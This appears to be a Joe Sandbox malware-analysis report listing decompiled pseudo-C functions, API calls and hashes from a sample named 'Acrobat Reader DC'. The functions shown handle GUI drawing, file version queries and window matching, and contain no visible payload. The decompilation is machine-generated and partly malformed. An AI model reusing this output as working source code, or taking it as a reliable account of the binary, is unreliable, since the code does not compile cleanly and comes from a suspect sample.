                                  				RoundRect(_t152, _v60.left, _v60.top, _v60.right, _v60.bottom, 5, 5);
                                  				_v12 = 0x105;
                                  				_t159 = GetWindowLongW( *_a8, 0xfffffff0) & 0x00002000;
                                  				if(_t159 == 0) {
                                  					_v12 = 0x125;
                                  				}
                                  				_t93 = SendMessageW( *_a8, 0xe, 0, 0) + 1;
                                  				_v20 = _t93;
                                  				_push( ~(0 | _t159 > 0x00000000) | _t93 * 0x00000002);
                                  				_t95 = E004115D7(_t149, _t152, _t159);
                                  				_v28 = _t95;
                                  				GetWindowTextW( *_a8, _t95, _v20);
                                  				if(_v24 != 0) {
                                  					_v60.top =  *(_t149 + 0x20);
                                  					_v60 =  *(_t149 + 0x1c);
                                  					_v60.right =  *(_t149 + 0x24);
                                  					_v60.bottom =  *(_t149 + 0x28);
                                  					InflateRect( &_v60, 0xfffffffd, 0xfffffffd);
                                  					DrawFocusRect(_t152,  &_v60);
                                  				}
                                  				if(_v16 != 0) {
                                  					SetTextColor(_t152, GetSysColor(0x11));
                                  				}
                                  				_t150 = _v28;
                                  				DrawTextW(_t152, _t150, 0xffffffff,  &_v60, _v12);
                                  				_push(_t150);
                                  				E004111DC();
                                  				SelectObject(_t152, _v32);
                                  				DeleteObject(_a4);
                                  				SelectObject(_t152, _v36);
                                  				DeleteObject(_v40);
                                  				SetTextColor(_t152, _v8);
                                  				SetBkColor(_t152, _v44);
                                  				return 1;
                                  			}

                                  APIs
                                  • GetSysColor.USER32(0000000E), ref: 00430913
                                  • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                  • GetSysColor.USER32(00000012), ref: 00430933
                                  • SetTextColor.GDI32(?,?), ref: 0043093B
                                  • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                  • GetSysColor.USER32(0000000F), ref: 00430959
                                  • CreateSolidBrush.GDI32(?), ref: 00430962
                                  • GetSysColor.USER32(00000011), ref: 00430979
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                  • SelectObject.GDI32(?,00000000), ref: 0043099C
                                  • SetBkColor.GDI32(?,?), ref: 004309A6
                                  • SelectObject.GDI32(?,?), ref: 004309B4
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                  • GetWindowTextW.USER32 ref: 00430A5A
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                  • DrawFocusRect.USER32 ref: 00430A91
                                  • GetSysColor.USER32(00000011), ref: 00430A9F
                                  • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                  • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                  • SelectObject.GDI32(?,?), ref: 00430AD0
                                  • DeleteObject.GDI32(00000105), ref: 00430ADC
                                  • SelectObject.GDI32(?,?), ref: 00430AE3
                                  • DeleteObject.GDI32(?), ref: 00430AE9
                                  • SetTextColor.GDI32(?,?), ref: 00430AF0
                                  • SetBkColor.GDI32(?,?), ref: 00430AFB
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 1582027408-0
                                  • Opcode ID: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                  • Opcode Fuzzy Hash: 1c1fb4ccc90ca3c01eeee5a68a8ff6c4e85f7d1c42b7366d75b3c8e5274adb0a
                                  • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00433A13(short* _a4, intOrPtr _a8, intOrPtr _a12) {
                                  				void* _v8;
                                  				void* _v12;
                                  				unsigned int _v16;
                                  				int _v20;
                                  				int _v24;
                                  				void* __edi;
                                  				void* __esi;
                                  				int _t39;
                                  				int _t40;
                                  				int _t42;
                                  				int _t46;
                                  				int _t61;
                                  				int _t64;
                                  				void* _t75;
                                  				void* _t85;
                                  				unsigned int _t86;
                                  				intOrPtr _t101;
                                  				intOrPtr _t103;
                                  				intOrPtr _t105;
                                  				int _t109;
                                  				short* _t110;
                                  				void* _t115;
                                  				void* _t116;
                                  				void* _t118;
                                  				void* _t125;
                                  				void* _t126;
                                  
                                  				_t116 = _t115 - 0x14;
                                  				_t101 = _a12;
                                  				_t109 = GetFileVersionInfoSizeW(_a4,  &_v24);
                                  				if(_t109 != 0) {
                                  					_push(_t109);
                                  					_t75 = E004115D7(_t101, _t109, __eflags);
                                  					GetFileVersionInfoW(_a4, 0, _t109, _t75);
                                  					_push( ~(0 | __eflags > 0x00000000) | (E004111C1(_t101) + 0x0000001a) * 0x00000002);
                                  					_t110 = E004115D7(_t101, _t109, __eflags);
                                  					E00411567(_t110, "\\");
                                  					_t39 = E0041313C(_t101, "\\");
                                  					_t118 = _t116 + 0x1c;
                                  					__eflags = _t39;
                                  					if(_t39 != 0) {
                                  						E00411536(_t110, L"StringFileInfo\\");
                                  						_t61 = E004134BD(_t101, "\\");
                                  						_t125 = _t118 + 0x10;
                                  						__eflags = _t61;
                                  						if(_t61 != 0) {
                                  							E00411536(_t110, _t101);
                                  							_t118 = _t125 + 8;
                                  						} else {
                                  							_t64 = VerQueryValueW(_t75, L"\\VarFileInfo\\Translation",  &_v12,  &_v20);
                                  							__eflags = _t64;
                                  							if(_t64 == 0) {
                                  								E00411536(_t110, L"04090000");
                                  								_t126 = _t125 + 8;
                                  							} else {
                                  								_t14 =  &(_t110[0x10]); // 0x20
                                  								_v16 =  *_v12;
                                  								E00432E88( *_v12, 0, _t14, 4);
                                  								_t17 =  &(_t110[0x14]); // 0x28
                                  								E00432E88(_v16 >> 0x10, 0, _t17, 4);
                                  								_t126 = _t125 + 0x20;
                                  							}
                                  							E00411536(_t110, "\\");
                                  							E00411536(_t110, _t101);
                                  							_t118 = _t126 + 0x10;
                                  						}
                                  					}
                                  					_t40 = E004114AB(_t101, _t101, L"DefaultLangCodepage");
                                  					__eflags = _t40;
                                  					if(_t40 != 0) {
                                  						_t42 = VerQueryValueW(_t75, _t110,  &_v8,  &_v20);
                                  						__eflags = _t42;
                                  						if(_t42 == 0) {
                                  							_push(_t75);
                                  							E004111DC();
                                  							_push(_t110);
                                  							E004111DC();
                                  							__eflags = 0;
                                  							return 0;
                                  						} else {
                                  							_t46 = E0041313C(_t101, "\\");
                                  							__eflags = _t46;
                                  							if(_t46 != 0) {
                                  								_t103 = _a8;
                                  								E00412FBA(_t103, _v8, 0x200);
                                  								__eflags = 0;
                                  								 *((short*)(_t103 + 0x400)) = 0;
                                  							} else {
                                  								_t85 = _v8;
                                  								_t86 =  *(_t85 + 0xc);
                                  								_push(_t86 & 0x0000ffff);
                                  								_push(_t86 >> 0x10);
                                  								_push( *(_t85 + 8) & 0x0000ffff);
                                  								E0041329B(_a8, _a8, L"%u.%u.%u.%u",  *(_t85 + 8) >> 0x10);
                                  							}
                                  							_push(_t75);
                                  							E004111DC();
                                  							_push(_t110);
                                  							E004111DC();
                                  							return 1;
                                  						}
                                  					} else {
                                  						_t105 = _a8;
                                  						_t19 =  &(_t110[0x10]); // 0x20
                                  						E00412FBA(_t105, _t19, 8);
                                  						__eflags = 0;
                                  						_push(_t75);
                                  						 *((short*)(_t105 + 0x10)) = 0;
                                  						E004111DC();
                                  						_push(_t110);
                                  						E004111DC();
                                  						return 1;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}






























                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                  • API String ID: 1503153545-1459072770
                                  • Opcode ID: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                  • Opcode Fuzzy Hash: efc6e4e5e9717c78149bced3479276292890345fc235e4a69a67d693c99869e0
                                  • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00469296(void* __edx, void* __eflags, void* __fp0, intOrPtr* _a4) {
                                  				char _v24;
                                  				char _v40;
                                  				char _v56;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t33;
                                  				void* _t35;
                                  				void* _t37;
                                  				void* _t39;
                                  				char* _t53;
                                  				void* _t61;
                                  				void* _t62;
                                  				intOrPtr* _t64;
                                  				void* _t77;
                                  
                                  				_t77 = __fp0;
                                  				_t61 = __edx;
                                  				E0040BC70( &_v24, __eflags);
                                  				_t58 =  &_v40;
                                  				E0040BC70( &_v40, __eflags);
                                  				_t64 = _a4;
                                  				if(E00436565(_t64) != 0 || E004114AB(_t62,  *_t64, L"LAST") == 0) {
                                  					_t53 = L"[LAST";
                                  					goto L14;
                                  				} else {
                                  					if(E004114AB(_t62,  *_t64, L"ACTIVE") != 0) {
                                  						_t33 = E0041341F( *_t64, L"HANDLE=", 7);
                                  						__eflags = _t33;
                                  						if(_t33 != 0) {
                                  							_t35 = E0041341F( *_t64, L"REGEXP=", 7);
                                  							__eflags = _t35;
                                  							if(_t35 != 0) {
                                  								_t37 = E0041341F( *_t64, L"CLASSNAME=", 0xa);
                                  								__eflags = _t37;
                                  								if(_t37 != 0) {
                                  									_t39 = E004114AB(_t62,  *_t64, L"ALL");
                                  									__eflags = _t39;
                                  									if(_t39 == 0) {
                                  										_t53 = L"[ALL";
                                  										goto L14;
                                  									}
                                  								} else {
                                  									E00402160( &_v24, L"[CLASS:", _t61, _t62);
                                  									_push(0xffffffff);
                                  									_push(0xa);
                                  									goto L10;
                                  								}
                                  							} else {
                                  								E00402160( &_v24, L"[REGEXPTITLE:", _t61, _t62);
                                  								_push(0xffffffff);
                                  								_push(7);
                                  								goto L10;
                                  							}
                                  						} else {
                                  							E00402160( &_v24, L"[HANDLE:", _t61, _t62);
                                  							_push(0xffffffff);
                                  							_push(7);
                                  							L10:
                                  							_push( &_v56);
                                  							_push(_t64);
                                  							E0040E0A0( &_v40, E0046150F(__eflags));
                                  							_t58 =  &_v56;
                                  							E00402250( &_v56);
                                  							E00461321(__eflags, _t77,  &_v40);
                                  							E0040BD50( &_v24, _t77,  &_v40);
                                  							_t64 = _a4;
                                  							goto L15;
                                  						}
                                  					} else {
                                  						_t53 = L"[ACTIVE";
                                  						L14:
                                  						E00402160( &_v24, _t53, _t61, _t62);
                                  						L15:
                                  						E0040D200( &_v24, _t58, "]", _t77);
                                  						E0040E0A0(_t64,  &_v24);
                                  					}
                                  				}
                                  				E00402250( &_v40);
                                  				return E00402250( &_v24);
                                  			}



















                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __wcsicoll$__wcsnicmp
                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                  • API String ID: 790654849-32604322
                                  • Opcode ID: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                  • Opcode Fuzzy Hash: fda3356f9a514e75ac50708b2e0f549657cc7649cef593225b85309bc7d45243
                                  • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E0044870C(void* __eflags, intOrPtr _a4, signed int _a8) {
                                  				int _v20;
                                  				void* _v28;
                                  				intOrPtr _v56;
                                  				int _v60;
                                  				long _v64;
                                  				void* _v68;
                                  				int _v100;
                                  				signed int _v104;
                                  				long _v108;
                                  				int _v112;
                                  				void* _v116;
                                  				signed int _v120;
                                  				struct HWND__** _v124;
                                  				struct HWND__* _v128;
                                  				signed char _v132;
                                  				signed int _v133;
                                  				signed int _v140;
                                  				int _v148;
                                  				intOrPtr _t172;
                                  				signed int _t176;
                                  				void* _t178;
                                  				signed char _t179;
                                  				signed char _t181;
                                  				signed int _t198;
                                  				signed char _t199;
                                  				signed char _t201;
                                  				int _t209;
                                  				signed int _t212;
                                  				struct HWND__* _t215;
                                  				signed int _t221;
                                  				struct HWND__* _t226;
                                  				intOrPtr* _t229;
                                  
                                  				_t198 = _a8;
                                  				if(E00441AF5(0x4a8630, _a4,  &_v120,  &_v132) != 0) {
                                  					_t172 =  *0x4a8690; // 0x0
                                  					_t209 =  *0x4a86a4; // 0xa51ad0
                                  					_t224 = _v132;
                                  					_t229 =  *((intOrPtr*)( *((intOrPtr*)(_t209 + _v132 * 4))));
                                  					_v124 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + _v120 * 4))));
                                  					_v128 =  *_t229;
                                  					_v133 =  *((intOrPtr*)(_t229 + 0x88));
                                  					_v140 = 0;
                                  					if(_t198 < 0) {
                                  						_t198 = 0;
                                  					}
                                  					_t176 = _t198 & 0x00000100;
                                  					_v132 = _t176;
                                  					if(_t176 != 0) {
                                  						E004415D1(_v120, _t224);
                                  						_v148 = 1;
                                  					}
                                  					if((_t198 & 0x00000800) != 0) {
                                  						SetWindowPos(_v128, 0, 0, 0, 0, 0, 0x13);
                                  						_v140 = 1;
                                  					}
                                  					_t178 = (_v133 & 0x000000ff) + 0xfffffff7;
                                  					if(_t178 > 0x11) {
                                  						L62:
                                  						_t199 = _t198 & 0x000010f8;
                                  						_t179 = _t199;
                                  						_v132 = _t179;
                                  						if(_t199 > 0) {
                                  							_t226 = _v128;
                                  							_t201 = 0;
                                  							_v140 = 1;
                                  							if(_t179 < 0) {
                                  								_t201 = 0xc0;
                                  								EnableWindow(_t226, 0);
                                  								_t179 = _v132;
                                  							}
                                  							if((_t179 & 0x00000040) != 0) {
                                  								_t201 = 0xc0;
                                  								EnableWindow(_t226, 1);
                                  								_t179 = _v132;
                                  							}
                                  							_t221 = _t179 & 0x00000020;
                                  							if(_t221 != 0) {
                                  								_t201 = _t201 + 0x30;
                                  							}
                                  							_t212 = _t179 & 0x00000010;
                                  							_v132 = _t212;
                                  							if(_t212 != 0) {
                                  								_t201 = _t201 + 0x30;
                                  							}
                                  							if((_t179 & 0x00000008) != 0) {
                                  								_t201 = _t201 + 0x1008;
                                  							}
                                  							if((_t179 & 0x00001000) != 0) {
                                  								_t201 = _t201 + 0x1008;
                                  							}
                                  							_t181 =  *((intOrPtr*)(_t229 + 0x8b));
                                  							 *(_t229 + 0x8a) =  !_t201 &  *(_t229 + 0x8a) | _t179;
                                  							if(_t181 == 0xff) {
                                  								L78:
                                  								if(_t221 != 0) {
                                  									ShowWindow(_t226, 0);
                                  								}
                                  								if(_v132 != 0) {
                                  									ShowWindow(_t226, 4);
                                  									if(_v133 == 0x1a && ( *(_t229 + 0x8a) & 0x00000040) != 0) {
                                  										EnableWindow(_t226, 1);
                                  									}
                                  								}
                                  								E00430B87(_v124, _t229, 1);
                                  							} else {
                                  								_t215 = _v124[0x65];
                                  								if((_t181 & 0x000000ff) == _t215 || _t215 == 0xffffffff) {
                                  									goto L78;
                                  								}
                                  							}
                                  						}
                                  						goto L85;
                                  					} else {
                                  						switch( *((intOrPtr*)(( *(_t178 + 0x448d50) & 0x000000ff) * 4 +  &M00448D24))) {
                                  							case 0:
                                  								__eax = __ebx & 0x00000007;
                                  								if(__eax == 0) {
                                  									__ecx = _v128;
                                  									_push(0);
                                  									_push(0);
                                  									_push(0x466);
                                  									_push(_v128);
                                  									goto L60;
                                  								} else {
                                  									if(__eax == 0) {
                                  										__eax = _v128;
                                  										_push(0xffff0000);
                                  										_push(0xffffffff);
                                  										_push(0x465);
                                  										_push(_v128);
                                  										L60:
                                  										if(SendMessageW() != 0) {
                                  											goto L61;
                                  										}
                                  									} else {
                                  										__edx = _v128;
                                  										__eax = SendMessageW(_v128, 0x467, 0, 0);
                                  										goto L61;
                                  									}
                                  								}
                                  								goto L62;
                                  							case 1:
                                  								if((__bl & 0x00000010) != 0) {
                                  									__ecx = _v124;
                                  									__eax =  *(__esi + 0x8b) & 0x000000ff;
                                  									if( *((char*)(__ecx + 0x19c)) != 0) {
                                  										__edx =  *(__ecx + 0x198);
                                  										 *(__ecx + 0x194) =  *(__ecx + 0x198);
                                  									}
                                  									__edi = __ecx;
                                  									__eax =  *(__esi + 0x8b) & 0x000000ff;
                                  									 *(__edi + 0x198) =  *(__esi + 0x8b) & 0x000000ff;
                                  									goto L61;
                                  								}
                                  								goto L62;
                                  							case 2:
                                  								goto L1;
                                  							case 3:
                                  								__ecx =  *(__esi + 8);
                                  								__eax =  &_v116;
                                  								_v140 = 0;
                                  								_v116 = 0x30;
                                  								_v112 = 1;
                                  								if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) == 0 || (__bl & 0x00000020) != 0) {
                                  									goto L1;
                                  								} else {
                                  									if(__bl < 0) {
                                  										_v140 = 3;
                                  									}
                                  									if((__bl & 0x00000001) != 0) {
                                  										_v140 = _v140 | 0x00000008;
                                  									}
                                  									if(_v132 != 0) {
                                  										_v140 = _v140 | 0x00000080;
                                  									}
                                  									if((_v104 & 0x00000008) != 0 && (__bl & 0x00000004) == 0) {
                                  										_v140 = _v140 | 0x00000008;
                                  									}
                                  									__ecx =  *(__esi + 8);
                                  									__edx = _v140;
                                  									__eax =  &_v116;
                                  									_v104 = _v140;
                                  									__eax = SetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116);
                                  									if((__ebx & 0x00000200) == 0) {
                                  										__ecx =  *(__esi + 8);
                                  										__eax =  &_v116;
                                  										if(GetMenuItemInfoW( *(__esi + 8), __edi, 0,  &_v116) != 0 && (_v104 & 0x00001000) != 0) {
                                  											_push(0);
                                  											_push(0xffffffff);
                                  											goto L51;
                                  										}
                                  									} else {
                                  										_push(0);
                                  										_push(__edi);
                                  										L51:
                                  										__edx =  *(__esi + 8);
                                  										__eax = SetMenuDefaultItem( *(__esi + 8), ??, ??);
                                  									}
                                  									__eax = _v124;
                                  									__ecx =  *_v124;
                                  									__eax = DrawMenuBar( *_v124);
                                  									goto L61;
                                  								}
                                  								goto L97;
                                  							case 4:
                                  								__ecx =  *(__esi + 0x30);
                                  								__eax = GetWindowLongW( *(__esi + 0x30), 0xfffffff0);
                                  								__edx =  *(__esi + 0xc);
                                  								__bl = __bl & 0x00000001;
                                  								__bl & 0x00000001 =  ~(__bl & 0x00000001);
                                  								asm("sbb eax, eax");
                                  								__eax =  ~(__bl & 0x00000001) & 0x00001000;
                                  								__eax = ( ~(__bl & 0x00000001) & 0x00001000) + 0x1000;
                                  								_v64 =  *(__esi + 0xc);
                                  								_v68 = 8;
                                  								_v56 = 0xf010;
                                  								_v60 = __eax;
                                  								if((__ebx & 0x00000200) != 0) {
                                  									_v60 = __eax;
                                  								}
                                  								__edx =  *(__esi + 0x30);
                                  								__edi = SendMessageW;
                                  								__ecx =  &_v68;
                                  								__eax = SendMessageW( *(__esi + 0x30), 0x113f, 0,  &_v68);
                                  								if((__ebx & 0x00000400) != 0) {
                                  									__eax =  *(__esi + 0xc);
                                  									__ecx =  *(__esi + 0x30);
                                  									__eax = SendMessageW( *(__esi + 0x30), 0x1102, 2,  *(__esi + 0xc));
                                  								}
                                  								if(_v132 != 0) {
                                  									__edx =  *(__esi + 0x30);
                                  									E00441B7C(0x4a8630,  *(__esi + 0x30)) = _v128;
                                  									__eax = E004415D1(_v128, _v128);
                                  									__ecx =  *(__esi + 0xc);
                                  									__edx =  *(__esi + 0x30);
                                  									__eax = SendMessageW( *(__esi + 0x30), 0x110b, 9,  *(__esi + 0xc));
                                  								}
                                  								goto L61;
                                  							case 5:
                                  								__esi =  *(__esi + 0x30);
                                  								__edx =  &_v28;
                                  								_v140 = 0;
                                  								_v28 = 1;
                                  								_v20 = __edi;
                                  								__edi = SendMessageW(__esi, 0x1053, 0xffffffff,  &_v28);
                                  								if(__edi == 0xffffffff) {
                                  									goto L1;
                                  								} else {
                                  									_v112 = __edi;
                                  									_v108 = 0;
                                  									_v116 = 8;
                                  									__eax = GetWindowLongW(__esi, 0xffffffec);
                                  									if((__al & 0x00000004) != 0 && (__bl & 0x00000005) != 0) {
                                  										__ebx - 1 =  ~(__ebx - 1);
                                  										__ecx =  &_v116;
                                  										asm("sbb eax, eax");
                                  										 ~(__ebx - 1) & 0xfffff000 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
                                  										_v100 = 0xf000;
                                  										_v104 = ( ~(__ebx - 1) & 0xfffff000) + 0x2000;
                                  										_v140 = SendMessageW(__esi, 0x104c, 0,  &_v116);
                                  									}
                                  									if((__ebx & 0x00002100) == 0) {
                                  										L85:
                                  										return _v140;
                                  									} else {
                                  										if(_v132 != 0) {
                                  											_v104 = 0xffffffff;
                                  										}
                                  										if((__ebx & 0x00002000) != 0) {
                                  											_v104 = 0;
                                  										}
                                  										__edx =  &_v116;
                                  										_v100 = 3;
                                  										__eax = SendMessageW(__esi, 0x102b, __edi,  &_v116);
                                  										_pop(__edi);
                                  										_pop(__esi);
                                  										_pop(__ebx);
                                  										return __eax;
                                  									}
                                  								}
                                  								goto L97;
                                  							case 6:
                                  								__eax = 3;
                                  								if( *0x4a86b4 >= 3) {
                                  									do {
                                  										__ecx =  *0x4a86a4;
                                  										__ecx =  *( *0x4a86a4 + __eax * 4);
                                  										if( *__ecx == 0) {
                                  											goto L20;
                                  										} else {
                                  											__ecx =  *__ecx;
                                  											__edx =  *(__ecx + 4);
                                  											__edi = _v124;
                                  											if( *(__ecx + 4) != _v124[1] ||  *((char*)(__ecx + 0x88)) != 3 || __ecx !=  *(__esi + 0x30)) {
                                  												goto L20;
                                  											} else {
                                  												__cl =  *((intOrPtr*)(__esi + 0x8a));
                                  												if((__bl & __cl) == 0 && (__cl & 0x00000010) != 0) {
                                  													__edx =  *0x4a86a4;
                                  													__eax =  *( *0x4a86a4 + __eax * 4);
                                  													__eax =  *__eax;
                                  													__ecx =  *(__eax + 0x86);
                                  													__edx =  *(__eax + 0x84);
                                  													__ecx =  *((short*)(__eax + 0x82));
                                  													__edx =  *((short*)(__eax + 0x80));
                                  													__eax = MoveWindow(__eax, __edx, __ecx,  *(__eax + 0x84),  *(__eax + 0x86), 0);
                                  													__ecx =  *(__esi + 0x30);
                                  													__edx = _v128;
                                  													__eax = SendMessageW(_v128, 0x469,  *(__esi + 0x30), 0);
                                  												}
                                  											}
                                  										}
                                  										goto L62;
                                  										L20:
                                  										__eax = __eax + 1;
                                  									} while (__eax <=  *0x4a86b4);
                                  								}
                                  								goto L62;
                                  							case 7:
                                  								if((__ebx & 0x00000200) != 0) {
                                  									__edx = _v124;
                                  									 *_v124 = SendMessageW( *_v124, 0x401, __edi, 0);
                                  									if(GetFocus() == __esi->i) {
                                  										__ecx = _v120;
                                  										__eax = E004415D1(_v120, __edi);
                                  									}
                                  									goto L61;
                                  								}
                                  								goto L62;
                                  							case 8:
                                  								__eax = __ebx;
                                  								__eax = __ebx & 0x00000007;
                                  								if(__eax != 0) {
                                  									__edx = _v128;
                                  									__eax = SendMessageW(_v128, 0xf1, __eax, 0);
                                  									goto L61;
                                  								}
                                  								goto L62;
                                  							case 9:
                                  								_t190 = _t198 & 0x00000007;
                                  								if((_t198 & 0x00000007) != 0) {
                                  									E00440D98(_t224, _t190 & 0x00000003);
                                  									L61:
                                  									_v140 = 1;
                                  								}
                                  								goto L62;
                                  							case 0xa:
                                  								goto L62;
                                  						}
                                  					}
                                  				} else {
                                  					L1:
                                  					return 0;
                                  				}
                                  				L97:
                                  			}

                                  APIs
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window
                                  • String ID: 0
                                  • API String ID: 2353593579-4108050209
                                  • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                  • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                  • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004341E6(intOrPtr _a4, int _a8, short* _a12, long _a16) {
                                  				void* __edi;
                                  				long _t9;
                                  				struct HINSTANCE__* _t11;
                                  				struct HINSTANCE__* _t12;
                                  				struct HINSTANCE__* _t13;
                                  				struct HINSTANCE__* _t14;
                                  				char* _t24;
                                  				short* _t25;
                                  
                                  				_t25 = _a12;
                                  				_t9 = 0;
                                  				_t24 = _a16;
                                  				 *_t24 = 0;
                                  				_a16 = 0;
                                  				if( *_t25 == 0) {
                                  					L13:
                                  					return _t9;
                                  				} else {
                                  					if(E004114AB(_t24, _t25, L"blank") != 0) {
                                  						_t11 = E004114AB(_t24, _t25, L"info");
                                  						if(_t11 == 0) {
                                  							return LoadIconW(_t11, 0x7f04);
                                  						}
                                  						_t12 = E004114AB(_t24, _t25, L"question");
                                  						if(_t12 != 0) {
                                  							_t13 = E004114AB(_t24, _t25, L"stop");
